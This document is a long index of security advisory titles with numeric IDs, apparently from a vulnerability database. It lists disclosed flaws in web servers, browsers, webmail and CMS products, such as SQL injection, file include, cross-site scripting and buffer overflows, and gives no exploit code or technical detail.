[25091] ADempiere Bazaar WebUI Unspecified Authentication Bypass Vulnerability
[25089] Advanced Webhost Billing System Multiple Vulnerabilities
[25061] Web Yapar Multiple SQL Injection Vulnerabilities
[25045] Webbler CMS Mail A Friend Open Email Relay Vulnerability
[25040] Webbler CMS Index.PHP Multiple Cross-Site Scripting Vulnerabilities
[25033] IBM WebSphere Application Server 6.0.2.19 Unspecified Vulnerability
[25012] Webspell Index.PHP Local File Include Vulnerability
[24977] TeamSpeak WebServer Remote Denial Of Service Vulnerability
[24970] Opera Web Browser Dangling Pointer Remote Code Execution Vulnerability
[24936] Marshal MailMarshal SMTP Spam Quarantine Interface User Password Change Vulnerability
[24918] RETIRED: Konqueror Web Browser Data: URL Scheme Address Bar Spoofing Vulnerability
[24917] Opera Web Browser Address Bar URI Spoofing Vulnerability
[24913] Citadel WebCit Multiple Input Validation Vulnerabilities
[24900] activeWeb contentserver Permissions Bypass Weakness
[24898] ActiveWeb Contentserver CMS Client Side Filtering Bypass Vulnerability
[24896] ActiveWeb Contentserver Mimetype Name HTML Injection Vulnerability
[24895] ActiveWeb Contentserver Multiple Cross-Site Scripting Vulnerabilities
[24894] ActiveWeb Contentserver Picture_Real_Edit.ASP SQL Injection Vulnerability
[24878] Webmatic Multiple SQL Injection Vulnerabilities
[24832] Sun Java Runtime Environment Web Start JNLP File Stack Buffer Overflow Vulnerability
[24779] Microsoft Windows Vista Teredo Interface Firewall Bypass Vulnerability
[24773] SAP DB Web Server WAHTTP.EXE Multiple Buffer Overflow Vulnerabilities
[24722] Ripe Website Manager Multiple Remote File Include and Information Disclosure Vulnerabilities
[24714] WebApp.org and WebApp.net Multiple Input Validation Vulnerabilities
[24701] WebChat Login.PHP SQL Injection Vulnerability
[24697] Oracle Rapid Install Web Server Secondary Login Page Cross Site Scripting Vulnerability
[24695] Sun Java Web Start Arbitrary File Overwrite Privilege Escalation Vulnerability
[24676] SAP NetWeaver and Web Dynpro Java Cross-Site Scripting Vulnerability
[24664] Eva-Web Index.PHP3 Multiple Remote File Include Vulnerabilities
[24628] LiteWEB Web Server Invalid Page Remote Denial of Service Vulnerability
[24623] Key Focus Web Server Index.WKF Cross-Site Scripting Vulnerability
[24608] IBM WebSphere Application Server Closed Connection Information Disclosure Vulnerability
[24598] Apple WebCore XMLHTTPRequest Cross-Site Scripting Vulnerability
[24597] Apple WebKit Invalid Type Conversion Remote Code Execution Vulnerability
[24581] SerWeb Load_Lang.PHP Remote File Include Vulnerability
[24552] Xunlei Web Thunder ThunderServer.webThunder.1 ActiveX Control Arbitrary File Download Vulnerability
[24550] RETIRED: W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
[24516] WebIf OutConfig Parameter Local File Include Vulnerability
[24505] IBM WebSphere Application Server Unspecified Vulnerabilities
[24476] Apache Tomcat JSP Example Web Applications Cross Site Scripting Vulnerability
[24456] Mbedthis AppWeb HTTP TRACE Information Disclosure Vulnerability
[24454] Mbedthis AppWeb URL Protocol Format String Vulnerability
[24448] RETIRED: Microsoft Internet Explorer Navigation Cancel Webpage Spoofing Vulnerability
[24419] WebWiz Rich Text Editor Topics Page HTML Injection Vulnerability
[24381] Webmin Pam_Login.CGI Multiple Unspecified Cross-Site Scripting Vulnerabilities
[24375] MiniWeb HTTP POST Headers Remote Denial of Service Vulnerability
[24373] Blue Coat Systems K9 Web Protection Remote Buffer Overflow Vulnerability
[24364] W1L3D4 WEBmarket Urunbak.ASP SQL Injection Vulnerability
[24355] Yahoo! Messenger Webcam Viewer ActiveX Control Buffer Overflow Vulnerability
[24354] Yahoo! Messenger Webcam Upload ActiveX Control Buffer Overflow Vulnerability
[24352] Opera Web Browser Basic Authentication Server Domain Spoofing Vulnerability
[24310] WebSVN Filedetails.PHP Cross-Site Scripting Vulnerability
[24307] IBM Lotus Domino Web Server Unspecified Remote Denial of Service Vulnerability
[24298] Microsoft Internet Explorer Location Object Webpage Spoofing Vulnerability
[24297] WebStudio CMS Index.PHP Cross-Site Scripting Vulnerability
[24240] IBM Web-based System Manager Unspecified Denial of Service Vulnerability
[24219] British Telecommunications Consumer Webhelper Multiple Buffer Overflow Vulnerabilities
[24216] British Telecommunications Webhelper Multiple Buffer Overflow Vulnerabilities
[24184] Yahoo! Messenger Webcam Viewer YWCVWR.DLL ActiveX Control Denial of Service Vulnerability
[24174] Zindizayn Okul Web Sistemi Multiple SQL Injection Vulnerabilities
[24165] Sun Java Web Proxy Server Multiple Buffer Overflow Vulnerabilities
[24164] Webavis Class.PHP Remote File Include Vulnerability
[24130] WebGUI ViewList Security Bypass Vulnerability
[24092] rdiffWeb Directory Traversal Vulnerability
[24081] GNU GNATS Gnatsweb.PL Cross-Site Scripting Vulnerability
[24080] Opera Web Browser Torrent File Handling Buffer Overflow Vulnerability
[24059] Madirish Webmail GLOBALS[basedir] Parameter Remote File Include Vulnerabilities
[24022] VDECK WebMail PrintCal.PL Cross-Site Scripting Vulnerability
[23979] Multiple BEA WebLogic Applications Multiple Vulnerabilities
[23970] Tools 4 Web News-Script NewsAdmin.PHP Remote File Include Vulnerability
[23962] Webdesproxy GET Request Buffer Overflow Vulnerability
[23950] CommuniGate Pro Web Mail HTML Injection Vulnerability
[23908] NetWin WebMail Unspecified Vulnerability
[23856] TurnkeyWebTools SunShop Shopping Cart Multiple Input Validation Vulnerabilities
[23847] Mini Web Shop Multiple Cross Site Scripting Vulnerabilities
[23846] Archangel Weblog Local File Include And Authentication Bypass Vulnerabilities
[23806] Microsoft Outlook Web Access Remote Script Injection Vulnerability
[23778] Progress WebSpeed Denial Of Service Vulnerability
[23728] Sun Java Web Start Unauthorized Access Vulnerability
[23713] Pi3Web Overly Long HTTP Request Denial Of Service Vulnerability
[23668] Multiple Web Browsers Digest Authentication HTTP Response Splitting Vulnerability
[23662] TurnkeyWebTools Sunshop Multiple Remote File Include Vulnerabilities
[23649] Asterisk ManagerInterface Manager.Conf Remote Denial of Service Vulnerability
[23634] Progress Webspeed _CPYFile.P Unauthorized Access Vulnerability
[23633] Advanced Webhost Billing System Cart2.PHP Remote File Include Vulnerability
[23597] Ripe Website Manager Multiple Input Validation Vulnerabilities
[23592] WEBinsta FM Manager Admin Cookies Remote File Include Vulnerability
[23556] Novell Groupwise WebAccess GWINTER.EXE Remote Buffer Overflow Vulnerability
[23539] Sun Java Web Console LibWebconsole_Services.SO Format String Vulnerability
[23511] TurnkeyWebTools Sunshop Multiple Remote File Include Vulnerabilities
[23499] Web Service Deluxe News Manager Deluxe Footer.PHP Local File Include Vulnerability
[23493] Web Slider Multiple Remote File Include Vulnerabilities
[23481] MailBee WebMail Pro Check_login.ASP Cross-Site Scripting Vulnerability
[23451] WebKalk2 Engine.Inc.PHP Remote File Include Vulnerability
[23448] PHPWebNews Multiple Cross-Site Scripting Vulnerabilities
[23437] Opera Web Browser Running Adobe Flash Player Information Disclosure Vulnerability
[23423] webMethods Glue Console Directory Traversal Vulnerability
[23421] IBM Lotus Domino Web Access Active Content Filter HTML Injection Vulnerability
[23413] Miniwebsvr Server Directory Traversal Vulnerability
[23348] WebSpell Picture.PHP Multiple Local File Include Vulnerabilities
[23276] Microsoft Windows Graphics Device Interface Font Rasterizer Local Privilege Escalation Vulnerability
[23268] Advanced Website Creator SQL Injection Vulnerabilities
[23182] Data Domain Administration Interface Local Privilege Escalation Vulnerability
[23179] NaviCopa Web Server GET Request Buffer Overflow Vulnerability
[23173] IBM Lotus Domino Web Access Email Message HTML Injection Vulnerability
[23171] AY System Solutions Web Content System Remote File Include Vulnerability
[23156] SB-WebSoft Addressbook Local File Include Vulnerability
[23136] Horde Groupware Webmail Edition Unspecified Parameters Multiple HTML Injection Vulnerabilities
[23131] WebFormatique Car Manager Joomla Component Index.PHP SQL Injection Vulnerability
[23109] Multiple ActiveWebSoftwares Products Default.ASP SQL Injection Vulnerability
[23098] ASPWebCalendar Calendar.ASP SQL Injection Vulnerability
[23095] ClassWeb Language.PHP Remote File Include Vulnerability
[23086] IBM WebSphere Application Server Unspecified HTTP Response Splitting Vulnerability
[23054] WebCalendar IncludeDir Multiple Remote File Include Vulnerabilities
[23051] Web Wiz Forums String Filtering SQL Injection Vulnerability
[22995] Cyber-Inside WebLog Local File Include Vulnerability
[22993] Sun Java System Web Server Unspecified Unauthorized Access Vulnerability
[22991] IBM WebSphere Application Server Source Code Disclosure Vulnerability
[22979] Viper Web Portal Index.PHP Remote File Include Vulnerability
[22975] Horde IMP Webmail Client Multiple Input Validation Vulnerabilities
[22974] GrafX Company Website Builder Pro Comanda.PHP Remote File Include Vulnerability
[22973] Sun Java System Web Server Certificate Revocation Access Control Bypass Vulnerability
[22953] WebCreator Multiple Remote File Include Vulnerabilities
[22877] Webo FolderTree.PHP Remote File Include Vulnerability
[22859] Sun Ipmitool Interface Remote Unauthorized Access Vulnerability
[22834] WebCalendar Certain Variable Overwrite Vulnerability
[22800] Bernard Joly Webring HTML Injection Vulnerability
[22798] WebSpell Multiple Input Validation Vulnerabilities
[22788] WebMod Content Length Stack Buffer Overflow Vulnerability
[22781] aWebNews Multiple Remote File Include Vulnerabilities
[22776] DivX Web Player NPDIVX32.DLL ActiveX Control Resize Method Remote Denial of Service Vulnerability
[22755] EmbeddedWB Web Browser ActiveX Control Remote Code Execution Vulnerability
[22748] Webmin Chooser.CGI Multiple Cross-Site Scripting Vulnerabilities
[22726] WebMplayer Multiple Input Validation Vulnerabilities
[22711] PHPWebGallery Multiple Scripts Multiple Cross-Site Scripting Vulnerabilities
[22701] Multiple Web Browser UTF-7 Cross-Domain Character-Set-Inheritance Vulnerability
[22691] WebAPP Multiple Vulnerabilities
[22681] J-Web Pics Navigator Jwpn-Photos.PHP Directory Traversal Vulnerability
[22672] InstallFromTheWeb Multiple Unspecified Buffer Overflow Vulnerabilities
[22659] WebSpell Printview.PHP SQL Injection Vulnerability
[22590] Ezboo Webstats Administrative Authentication Bypass Vulnerability
[22563] Webapp.Org Webapp Multiple Remote Vulnerabilities
[22559] WebTester Multiple Input Validation Vulnerabilities
[22557] MiniWebSVR Multiple Request Remote Denial of Service Vulnerability
[22554] MailEnable Web Mail Client Multiple HTML Injection and Cross-Site Scripting Vulnerabilities
[22541] WebSpell ShowOnly Parameter SQL Injection Vulnerability
[22523] Miniwebsvr Web Server Directory Traversal Vulnerability
[22502] Plain Old Webserver Firefox Extension Directory Traversal Vulnerability
[22455] Cpanel Web Hosting Manager OBJCache.PHP Remote File Include Vulnerability
[22444] WebMatic Index_Album.PHP Multiple Remote File Include Vulnerabilities
[22361] PHP Web Portail Includes.PHP Remote File Include Vulnerability
[22294] WebGUI Asset Deletion Security Bypass Vulnerability
[22291] WebFWLog Debug.PHP Information Disclosure Vulnerability
[22282] SpoonLabs Vivvo Article Management CMS Show_Webfeed.PHP SQL Injection Vulnerability
[22243] CGI Rescue WebForm Multiple Input Validation Vulnerabilities
[22234] Hitachi Web Server Multiple Vulnerabilities
[22192] Sun Ray Server Admin Graphical User Interface Administrator Password Disclosure Vulnerabilities
[22185] Atozed Software Intraweb Component HTTP Request Handling Remote Denial of Service Vulnerability
[22184] Symantec Web Security Multiple Denial of Service And Cross-Site Scripting Vulnerabilities
[22182] Mini Web Server Unspecified Multiple Buffer Overflow Vulnerabilities
[22176] EWebQuiz EWebQuiz.ASP SQL Injection Vulnerability
[22153] WebChat Defines.PHP Remote File Include Vulnerability
[22149] WebSpell Gallery.PHP SQL Injection Vulnerability
[22133] DivX Web Player NPDIVX32.DLL ActiveX Control Remote Denial of Service Vulnerability
[22114] WebGUI Registration Username HTML Injection Vulnerability
[22090] Twilight Webserver Remote Denial Of Service Vulnerability
[22089] IBM WebSphere Multiple Remote Vulnerabilities
[22060] Okul Web Otomasyon Sistemi Etkinlikbak.ASP SQL Injection Vulnerability
[22059] Apple WebKit WebCore Remote Denial of Service Vulnerability
[22051] WebGUI Wiki Title Cross-Site Scripting Vulnerability
[22040] FdWeB Espace Membre Admin_Menu.PHP Remote File Include Vulnerability
[21977] iPlanet Web Server Search Module Cross-Site Scripting Vulnerability
[21965] Magic Photo Storage Website Multiple Remote File Include Vulnerabilities
[21963] MOTIONBORG Web Real Estate Admin_Check_User.ASP SQL Injection Vulnerability
[21955] Direct Web Rendering Multiple Remote Vulnerabilities
[21928] Magic Photo Storage Website Common_Function.PHP Remote File Include Vulnerability
[21927] Cuyahoga FCKEditor Web.Config Security Bypass Vulnerability
[21911] OmniWeb Javascript Alert() Format String Vulnerability
[21906] Fon La Fonera Router Unauthorized Web Access Vulnerability
[21898] Acunetix Web Vulnerability Scanner Remote Denial of Service Vulnerability
[21816] AIDeX Mini-Webserver HTTP Request Remote Denial of Service Vulnerability
[21809] WebText User Profile PHP Code Injection Vulnerability
[21808] Durian Web Application Server Remote Buffer Overflow Vulnerability
[21787] AlstraSoft Web Host Directory Administrator Password Change Vulnerability
[21752] RETIRED: Enthrallweb eHomes Result.ASP SQL Injection Vulnerability
[21750] Enthrallweb ePages Actualpic.ASP SQL Injection Vulnerability
[21748] Enthrallweb eCars Types.ASP SQL Injection Vulnerability
[21742] Enthrallweb ePhotos SubLevel2.ASP SQL Injection Vulnerability
[21739] EnthrallWeb Multiple Products Myprofile.ASP Arbitrary User Password Change Vulnerability
[21712] HTTP Explorer Web Server Directory Traversal Vulnerability
[21711] Slooze PHP Web Photo Album Authorization Bypass Vulnerability
[21708] Calacode @Mail Webmail Filtering Engine HTML Injection Vulnerability
[21684] Web-App.Org and Web-App.Net Multiple Input Validation Vulnerabilities
[21678] Novell NetWare Welcome Web-App Unspecified Cross-Site Scripting Vulnerability
[21677] Mini Web Shop View.PHP Viewcategory.PHP Cross-Site Scripting Vulnerability
[21636] IBM WebSphere Application Server Multiple Remote Vulnerabilities
[21625] Bandwebsite Unauthorized Administrative Account Creation Vulnerability
[21622] MXBB Web Links Module MX_Root_Path Remote File Include Vulnerability
[21614] WeBWorK Program Generation Language Macro Security Restriction Bypass Vulnerability
[21608] IBM WebSphere Utility Classes Unspecified Vulnerability
[21544] Barman Interface.PHP Remote File Include Vulnerability
[21540] IBM WebSphere Host On-Demand Authentication Bypass Vulnerability
[21498] Web Hosting Manager Multiple Cross-Site Scripting Vulnerabilities
[21325] MailEnable WebAdmin Unauthorized Access Vulnerability
[21288] WebHost Manager Multiple Cross-Site Scripting Vulnerabilities
[21274] Wallpaper Complete Website Wallpaper.PHP SQL Injection Vulnerability
[21270] Recipes Complete Website SQL Injection Vulnerabilities
[21238] My Little Weblog Weblog.php Cross-Site Scripting Vulnerability
[21204] IBM WebSphere Application Server Prior to 6.1.0.3 Multiple Vulnerabilities
[21193] Enthrallweb EHomes Multiple Input Validation Vulnerabilities
[21192] Enthrallweb EClassifieds Multiple SQL Injection Vulnerabilities
[21178] phpWebThings Editor.PHP Remote File Include Vulnerabilities
[21158] BestWebApp Dating Site Multiple Input Validation Vulnerabilities
[21151] Enthrallweb EShopping Cart Multiple SQL Injection Vulnerabilities
[21123] Kerio WebStar Local Privilege Escalation Vulnerability
[21100] Biba Selenium Web Server Multiple Vulnerabilities
[21092] Web Inhabit A+ Store E-Commerce Input Validation Vulnerabilities
[21076] WWWeb Concepts CactuShop Multiple SQL Injection Vulnerabilities
[21042] Roundcube Webmail index.PHP Cross-Site Scripting Vulnerability
[21028] ELOG Web Logbook ELogD Server Denial Of Service Vulnerability
[21018] IBM WebSphere Faultactor Cross-Site Scripting Vulnerability
[20969] FreeWebShop Multiple Input Validation Vulnerabilities
[20937] Webdrivers Simple Forum Message_details.PHP SQL Injection Vulnerability
[20910] Essentia Web Server GET And HEAD Requests Remote Buffer Overflow Vulnerability
[20888] FreeWebShop Index.PHP Directory Traversal Vulnerability
[20887] FreeWebShop Index.PHP SQL Injection Vulnerability
[20877] SAP Web Application Server Remote Information Disclosure Vulnerability
[20873] SAP Web Application Server Remote Denial of Service Vulnerability
[20861] EFS Easy Address Book Web Server Data Parameter Multiple Cross-Site Scripting Vulnerabilities
[20840] Mirapoint Web Mail Expression() HTML Injection Vulnerability
[20827] BlooMooWeb ActiveX Control Multiple Vulnerabilities
[20825] Easy Web Portal Multiple Remote File Include Vulnerabilities
[20823] Easy File Sharing Web Server Information Disclosure and Input Validation Vulnerabilities
[20787] Simple Website Software Common.PHP Remote File Include Vulnerability
[20778] Web Wiz Forum Search.ASP SQL Injection Vulnerability
[20743] MiniHTTPServer Web Forum and File Sharing Server Add User Authentication Bypass Vulnerability
[20708] Sun Java System/iPlanet Messaging Server Webmail JavaScript Injection Vulnerability
[20687] MDWeb Multiple Remote File Include Vulnerabilities
[20662] Trawler Web CMS Multiple Remote File Include Vulnerabilities
[20653] Web Group Communication Center Quiz.PHP SQL Injection Vulnerability
[20605] Highwall Multiple Products Management Interface Multiple Input Validation Vulnerabilities
[20591] Opera Web Browser URI Tag Parsing Heap Buffer Overflow Vulnerability
[20590] Dev Web Manager System Index.PHP Cross-Site Scripting Vulnerability
[20554] Webgenius Goop Gallery Index.PHP Cross-Site Scripting Vulnerability
[20544] Asbru Software Web Content Editor Shell Command Execution Vulnerability
[20540] WebSpell Index.PHP SQL Injection Vulnerability
[20532] H-Sphere WebShell Login.PHP Cross-Site Scripting Vulnerability
[20459] Asbru Web Content Management Unauthorized Remote Access Vulnerability
[20455] IBM WebSphere Application Server Prior to 6.1.0.2 Multiple Vulnerabilities
[20436] IronWebMail Directory Traversal Information Disclosure Vulnerability
[20430] Jasmine-Web Index.PHP Remote File Include Vulnerability
[20421] Webmedia Explorer Core.Lib.PHP Remote File Include Vulnerability
[20412] Retired: PHPWebSite PHPWS_SOURCE_DIR Parameter Multiple Remote File Include Vulnerabilities
[20406] WebYep Webyep_SIncludePath Parameter Multiple Remote File Include Vulnerabilities
[20331] WEBGENEius GOOP Gallery Directory Traversal Vulnerability
[20295] PHP Web Scripts Easy Banner Functions.PHP Remote File Include Vulnerability
[20289] VAMP Webmail Yesno.PHTML Remote File Include Vulnerability
[20281] phpMyWebmin Multiple Remote File Include Vulnerabilities
[20264] phpMyWebmin Remote File Include and Information Disclosure Vulnerabilities
[20250] NaviCOPA Web Server Remote Buffer Overflow Vulnerability
[20239] Web//News Parser.PHP Remote File Include Vulnerability
[20231] PHPSelect Web Development Index.PHP3 Remote File Include Vulnerability
[20166] Web-News Template.PHP Remote File Include Vulnerability
[20145] XWeblog Kategori.ASP SQL Injection Vulnerability
[20119] Dr. Web Anti-Virus LHA Archive Heap Buffer-Overflow Vulnerability
[20116] Business Card Web Builder Startup.Inc.PHP Remote File Include Vulnerability
[20109] Neon WebMail For Java Multiple Input Validation Vulnerabilities
[20107] DigitalWebShop Multiple Remote File Include Vulnerabilities
[20060] Retired: Hitweb REP_CLASS Multiple Remote File Include Vulnerabilities
[20054] RETIRED: Web Wiz Forums Members.ASP Cross-Site Scripting Vulnerability
[19975] WebSPELL Database.PHP Authentication Bypass Vulnerability
[19966] IBM Lotus Domino Web Access Session Hijacking Vulnerability
[19944] MyABraCaDaWeb Base Parameter Multiple Remote File Include Vulnerabilities
[19896] RETIRED: Web Server Creator Customize.PHP Remote File Include Vulnerability
[19892] Web-Provence SL_Site Spaw_control.class.PHP Remote File Include Vulnerability
[19842] Easy Address Book Web Server Remote Format String Vulnerability
[19841] Alt-N MDaemon WebAdmin Component Unauthorized Access Vulnerability
[19836] Web Dictate Admin Authentication Bypass Vulnerability
[19820] Webmin and Usermin HTML Injection and Information Disclosure Vulnerability
[19757] IwebNegar Comments.PHP SQL Injection Vulnerability
[19744] Web3news PHPSECURITYADMIN_PATH Remote File Include Vulnerability
[19737] CliServ Web Community Multiple Remote File Include Vulnerabilities
[19735] AY Systems Web Content System Multiple Remote File Include Vulnerabilities
[19660] SAP-DB/MaxDB WebDBM Remote Buffer Overflow Vulnerability
[19631] WebAdmin Module for MDaemon Unspecified Privilege Escalation Vulnerability
[19620] WebAdmin Module for MDaemon Information Disclosure Vulnerability
[19569] WTCom Web Torrent SQL Injection Vulnerability
[19537] WikiWebWeaver Index.PHP Arbitrary File Upload Vulnerability
[19527] IBM WebSphere Application Server Prior to 6.0.2.13 Multiple Vulnerabilities
[19526] WEBInsta Mailing List Manager InitDB.PHP Remote File Include Vulnerability
[19511] Joomla Webring Component Admin.Webring.Docs.PHP SQL Injection Vulnerability
[19496] 04WebServer Multiple Vulnerabilities
[19492] Joomla Webring Remote File Include Vulnerability
[19491] Opera Web Browser IRC Chat Client Remote Denial of Service Vulnerability
[19489] WEBinsta CMS Templates_Dir Remote File Include Vulnerability
[19477] WEBinsta Mailing List Manager Install3.PHP Remote File Include Vulnerability
[19476] MyWebland miniBloggie Fname Remote File Include Vulnerability
[19463] IBM WebSphere Application Server 6.1.0 Multiple Vulnerabilities
[19462] Tiny Web Gallery Image Parameter Multiple Remote File Include Vulnerabilities
[19459] SaveWebPortal Page Parameter Remote File Include Vulnerability
[19436] Hitweb REP_INC Remote File Include Vulnerability
[19433] Comet WebFileManager CheckUpload.PHP Remote File Include Vulnerability
[19432] Archangel Weblog Multiple HTML Injection Vulnerabilities
[19403] CA eTrust Antivirus WebScan Malicious Update Code Execution Vulnerability
[19382] TurnkeyWebTools PHP Simple Shop Multiple Remote File Include Vulnerabilities
[19351] CA eTrust Antivirus WebScan Remote Buffer Overflow Vulnerability
[19306] SaveWeb Portal SITE_Path Parameter Multiple Remote File Include Vulnerabilities
[19253] SQLiteWebAdmin Multiple Input Validation Vulnerabilities
[19226] Advanced Webhost Billing System Contact.PHP Multiple Cross-Site Scripting Vulnerabilities
[19221] Microsoft Windows Graphical Device Interface Plus Library Denial Of Service Vulnerability
[19200] Sun Java System Application Server and Web Server Information Disclosure Vulnerability
[19166] RETIRED: Opera Web Browser CSS Background URI Memory Corruption Vulnerability
[19136] Checkpoint FireWall-1 Webserver Directory Traversal Vulnerability
[19063] OWASP WebScarab Cross-Site Scripting Vulnerability
[19030] Microsoft WebViewFolderIcon ActiveX Control Buffer Overflow Vulnerability
[19007] IceWarp Web Mail Multiple File Include Vulnerabilities
[18953] Cisco Router Web Setup (CRWS) Authentication Bypass Vulnerability
[18947] Drupal Webform Multiple Unspecified Cross-Site Scripting Vulnerabilities
[18926] Juniper Networks DX Web Login HTML Injection Vulnerability
[18916] MIMESweeper For Web Access Denied Cross-site Scripting Vulnerability
[18899] Webvizyon SayfalaAltList.ASP SQL Injection Vulnerability
[18878] FreeWebshop Multiple Input Validation Vulnerabilities
[18860] WebEx ActiveX Multiple Remote Code Execution Vulnerabilities
[18822] Apple Safari Web Browser DHTML SetAttributeNode() Null Dereference Denial Of Service Vulnerability
[18798] PHPWebGallery Comments.PHP Cross-site Scripting Vulnerability
[18744] Webmin/Usermin Unspecified Information Disclosure Vulnerability
[18672] IBM WebSphere Application Server Multiple Remote Vulnerabilities
[18613] Webmin Remote Directory Traversal Vulnerability
[18612] AEwebworks Dating Software Multiple Cross-Site Scripting Vulnerabilities
[18598] Open WebMail Openwebmail-read.PL Cross-Site Scripting Vulnerability
[18594] Opera Web Browser JPEG Image Handling Remote Buffer Overflow Vulnerability
[18578] IBM Websphere Application Server Prior to 6.0.2.11 Multiple Vulnerabilities
[18564] WeBBoA ID Parameter SQL Injection Vulnerability
[18521] WebWasher Remote ARJ Decoder Denial of Service Vulnerability
[18492] Mambo Weblinks SQL Injection Vulnerability
[18434] WebFORM and FORM2MAIL Open Email Relay Vulnerability
[18419] Cisco VPN3K/ASA WebVPN Clientless Mode Cross-Site Scripting Vulnerability
[18406] aWebNews Visview.PHP Remote File Include Vulnerability
[18386] Adaptive Website Framework Remote File Include Vulnerability
[18381] Microsoft Exchange Server Outlook Web Access Script Injection Vulnerability
[18378] WebprojectDB Multiple Remote File Include Vulnerabilities
[18308] Multiple Vendor Web Browser JavaScript Key Filtering Vulnerability
[18301] TIBCO Rendezvous HTTP Interface Remote Buffer Overflow Vulnerability
[18300] TIBCO Hawk Configuration Interface Local Buffer Overflow Vulnerability
[18260] WebspotBlogging Multiple Remote File Include Vulnerabilities
[18248] Ashwebstudio Ashnews Multiple Remote File Include Vulnerabilities
[18240] Weblog Oggi Index.PHP HTML Injection Vulnerability
[18235] aspWebLinks Links.ASP SQL Injection Vulnerability
[18201] F-Secure Multiple Products Web Console Buffer Overflow Vulnerability
[18175] WebCalendar Index.PHP Information Disclosure Vulnerability
[18161] EVA-Web Multiple Cross-Site Scripting Vulnerabilities
[18151] F@cile Interactive Web P-Themes Cross-Site Scripting Vulnerability
[18149] F@cile Interactive Web Multiple Remote File Include Vulnerabilities
[18144] Eitsop My Web Server Remote Denial of Service Vulnerability
[18106] PunkBuster WebTool WebKey Parameter Remote Buffer Overflow Vulnerability
[18091] Apple Xcode Tools WebObjects Unauthorized Remote Access Vulnerability
[18070] Destiney Rated Images Addweblog.PHP HTML Injection Vulnerability
[18041] JemWeb DownloadControl DC.PHP SQL Injection Vulnerability
[18006] SAP Web Application Server Input Validation Vulnerability
[17995] IceWarp Universal WebMail PHPSESSID Parameter Cross-Site Scripting Vulnerability
[17982] BEA WebLogic Multiple Vulnerabilities
[17956] Web-Labs CMS Multiple Cross-Site Scripting Vulnerabilities
[17919] IBM WebSphere Application Server Multiple Vulnerabilities
[17900] IBM WebSphere Application Server Welcome Page Security Restriction Bypass Vulnerability
[17883] Multiple Cisco Products WebSense Content Filtering Bypass Vulnerability
[17868] Website Baker User Display Name HTML Injection Vulnerability
[17858] Xeneo Web Server Source Disclosure Vulnerability
[17853] WebCalendar Username Enumeration Vulnerability
[17834] Bigwebmaster Guestbook Multiple HTML Injection Vulnerabilities
[17744] Blog Mod Weblog_posting.PHP SQL Injection Vulnerability
[17737] SWS Web Server Multiple Arbitrary Code Execution Vulnerabilities
[17688] PHPWebFTP Multiple Cross-Site Scripting Vulnerabilities
[17674] Apple Safari Web Browser Rowspan Denial Of Service Vulnerability
[17641] Asterisk Recording Interface Audio.PHP Information Disclosure Vulnerability
[17630] Manic Web MWGuest MWguest.PHP HTML Injection Vulnerability
[17557] PHPWebFTP Index.PHP Directory Traversal Vulnerability
[17536] Tiny Web Gallery Index.PHP Cross-Site Scripting Vulnerability
[17521] PHPWebSite Config.PHP File Include Vulnerability
[17513] Opera Web Browser Stylesheet Attribute Buffer Overflow Vulnerability
[17425] APT-webshop Modules.PHP Multiple SQL Injection Vulnerabilities
[17421] PHPWebGallery Multiple Cross-Site Scripting Vulnerabilities
[17418] TalentSoft Web+ Shop Deptname Parameter Cross-Site Scripting Vulnerability
[17417] AWeb's Scripts Seller Buy.PHP Authorization Bypass Vulnerability
[17416] AWeb's Banner Generator Cross-Site Scripting Vulnerability
[17412] Manic Web MWNewsletter Multiple Input Validation Vulnerabilities
[17408] Cherokee Webserver Cross-Site Scripting Vulnerability
[17359] Web-App.Org and Web-App.Net Multiple Cross-Site Scripting Vulnerabilities
[17352] AWebBB Multiple Input Validation Vulnerabilities
[17337] Hitachi Groupmax World Wide Web Unspecified Cross-Site Scripting Vulnerability
[17270] Blazix Java Application/Web Server JSP Source Disclosure Vulnerability
[17263] Web Host Automation Ltd. Helm Multiple Cross-Site Scripting Vulnerabilities
[17247] Maian Weblog Multiple SQL-Injection Vulnerabilities
[17228] WEBalbum Remote Command Execution Vulnerability
[17222] Pablo Software Solutions Baby Web/Quick 'n Easy Web ASP Source Disclosure Vulnerability
[17212] Webcheck Username HTML Injection Vulnerability
[17193] 1WebCalendar Multiple SQL Injection Vulnerabilities
[17190] Motorola Bluetooth Interface Dialog Spoofing Vulnerability
[17168] WebLogic Server and WebLogic Express Invalid Login Attempts Weakness
[17167] BEA WebLogic Server Remote Denial Of Service Vulnerability
[17166] BEA WebLogic Server Remote Filesystem Access Vulnerability
[17164] BEA WebLogic Portal JSR-168 Portlets Information Disclosure Vulnerability
[17163] BEA WebLogic Server and WebLogic Express HTTP Response Splitting Vulnerability
[17161] MailEnable Enterprise/Professional Editions Webmail Denial of Service Vulnerability
[17159] Maian Weblog Multiple SQL Injection Vulnerabilities
[17150] PHPWebSite Multiple SQL Injection Vulnerabilities
[17140] BorderWare MXtreme Web Administration Unspecified Remote Vulnerability
[17046] Easy File Sharing Web Server Multiple Input Validation Vulnerabilities
[17032] Micromuse Netcool/NeuSecure Website NS Account Password Disclosure Vulnerability
[16912] UKiWEB UKiBoard FCE.PHP BBCode HTML Injection Vulnerability
[16908] IBM WebSphere Application Server JSP Source Code Disclosure Vulnerability
[16895] NetworkActiv Web Server Remote Script Disclosure Vulnerability
[16848] Archangel Weblog Authentication Bypass Vulnerability
[16829] iGenus WebMail Config_Inc.PHP Remote File Include Vulnerability
[16825] PHPWebSite Topics.PHP SQL Injection Vulnerability
[16823] FreeHostShop Website Generator Arbitrary File Upload Vulnerability
[16812] DEV Web Management System HTML Injection Vulnerability
[16811] WEBInsta Limbo HTML Injection Vulnerability
[16793] NOCC Webmail Multiple Input Validation Vulnerabilities
[16789] Web Calendar Pro Dropbase.PHP SQL Injection Vulnerability
[16742] McAfee Webshield SMTP Remote Format String Vulnerability
[16721] Webpagecity WPC easy SQL Injection Vulnerability
[16719] E107 Website System Chatbox Plugin HTML Injection Vulnerability
[16706] V-webmail Multiple Cross-Site Scripting Vulnerabilities
[16673] WebSPELL Search.PHP SQL Injection Vulnerability
[16636] Microsoft Windows Web Client Buffer Overflow Vulnerability
[16614] E107 Website System BBCode HTML Injection Vulnerability
[16612] WebGUI User Creation Security Bypass Vulnerability
[16610] Noweb Insecure Temporary File Creation Vulnerability
[16579] ELOG Web Logbook Multiple Remote Vulnerabilities
[16544] Webeveyn Whomp! Real Estate Manager Login SQL Injection Vulnerability
[16542] WiredRed E/POP Web Conferencing HTML Injection Vulnerability
[16540] Sun Java Web Start Untrusted Application Unauthorized Access Vulnerability
[16444] PunctWeb MyCO Name Field HTML Injection Vulnerability
